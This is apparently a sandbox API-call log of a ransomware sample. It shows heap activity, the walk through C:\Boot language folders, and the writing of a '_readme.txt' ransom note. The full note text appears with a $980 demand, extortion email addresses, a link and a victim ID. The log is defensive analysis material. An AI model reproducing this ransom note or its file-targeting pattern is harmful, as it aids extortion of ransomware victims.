lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.389] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.389] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0188.389] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.389] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.389] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.389] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0188.390] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.390] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.390] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.391] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.391] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.391] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.391] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.391] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.391] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.392] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.392] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.392] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.392] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.392] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.393] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.393] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.393] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.393] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.393] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.393] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.394] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.394] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.394] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.394] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.394] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.395] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.395] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.395] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.395] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.395] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.395] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.396] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.396] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0188.396] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.396] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.396] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.396] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.397] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.397] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.397] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.397] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.397] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0188.397] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.398] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.398] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.398] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0188.398] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.399] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.399] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.399] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.399] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.399] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.399] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.399] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.400] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.400] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.400] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.400] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.400] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0188.400] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.401] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.401] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.401] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.401] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0188.401] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.402] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.402] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.402] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.402] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.402] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.402] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.402] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.403] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.403] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.403] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.403] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.404] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.404] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.404] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.404] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.404] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.405] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.405] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.405] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.405] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.406] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.406] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.406] PathFindFileNameW (pszPath="C:\\Boot\\nb-NO\\") returned="nb-NO\\" [0188.406] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.406] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.406] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0188.406] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.406] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0188.406] PathFindFileNameW (pszPath="") returned="" [0188.406] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.406] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x74ff0000 [0188.407] GetProcAddress (hModule=0x74ff0000, lpProcName="SHGetFolderPathW") returned 0x75075708 [0188.407] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x800) returned 0x2e902a8 [0188.407] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2e902a8 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0188.407] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x2e776e0 [0188.407] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.408] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.408] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f98 [0188.408] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.408] FreeLibrary (hLibModule=0x74ff0000) returned 1 [0188.409] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.409] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.409] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f98 | out: hHeap=0x620000) returned 1 [0188.409] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f98 [0188.409] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x81c) returned 0x2e776e0 [0188.409] PathAppendW (in: pszPath="C:\\Boot\\nb-NO\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\nb-NO\\_readme.txt") returned 1 [0188.409] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.410] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f98 | out: hHeap=0x620000) returned 1 [0188.410] PathFileExistsW (pszPath="C:\\Boot\\nb-NO\\_readme.txt") returned 0 [0188.410] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x2e96a68 [0188.410] lstrcpyW (in: lpString1=0x2e96a68, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0188.410] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0188.410] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e77f68 [0188.410] CreateFileW (lpFileName="C:\\Boot\\nb-NO\\_readme.txt" (normalized: "c:\\boot\\nb-no\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0188.411] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e77f68 | out: hHeap=0x620000) returned 1 [0188.412] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a68 | out: hHeap=0x620000) returned 1 [0188.412] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.412] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f98 [0188.412] FindFirstFileW (in: lpFileName="C:\\Boot\\nb-NO\\*" (normalized: "c:\\boot\\nb-no\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28daa640, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0188.413] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f98 | out: hHeap=0x620000) returned 1 [0188.413] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28daa640, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0188.413] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xea212efb, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15850, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0188.413] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f98 [0188.413] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0188.413] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f98 | out: hHeap=0x620000) returned 1 [0188.414] PathFindExtensionW (pszPath="C:\\Boot\\nb-NO\\bootmgr.exe.mui") returned=".mui" [0188.414] CreateFileW (lpFileName="C:\\Boot\\nb-NO\\bootmgr.exe.mui" (normalized: "c:\\boot\\nb-no\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0188.415] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0188.415] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xea212efb, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15850, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0188.415] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0188.416] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.416] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0188.416] PeekMessageW (in: lpMsg=0x312ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312ff08) returned 0 [0188.416] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0188.416] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0188.416] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f98 [0188.416] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.416] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.417] PathFindFileNameW (pszPath="C:\\Boot\\nl-NL\\") returned="nl-NL\\" [0188.417] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.417] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0188.417] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0188.417] PathFindFileNameW (pszPath="") returned="" [0188.417] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.417] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x74ff0000 [0188.417] GetProcAddress (hModule=0x74ff0000, lpProcName="SHGetFolderPathW") returned 0x75075708 [0188.417] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x800) returned 0x2e902a8 [0188.417] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2e902a8 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0188.417] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x2e765d0 [0188.417] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f98 [0188.417] FreeLibrary (hLibModule=0x74ff0000) returned 1 [0188.417] PathAppendW (in: pszPath="C:\\Boot\\nl-NL\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\nl-NL\\_readme.txt") returned 1 [0188.417] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.418] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.418] PathFileExistsW (pszPath="C:\\Boot\\nl-NL\\_readme.txt") returned 0 [0188.418] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x2e96a68 [0188.418] lstrcpyW (in: lpString1=0x2e96a68, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact 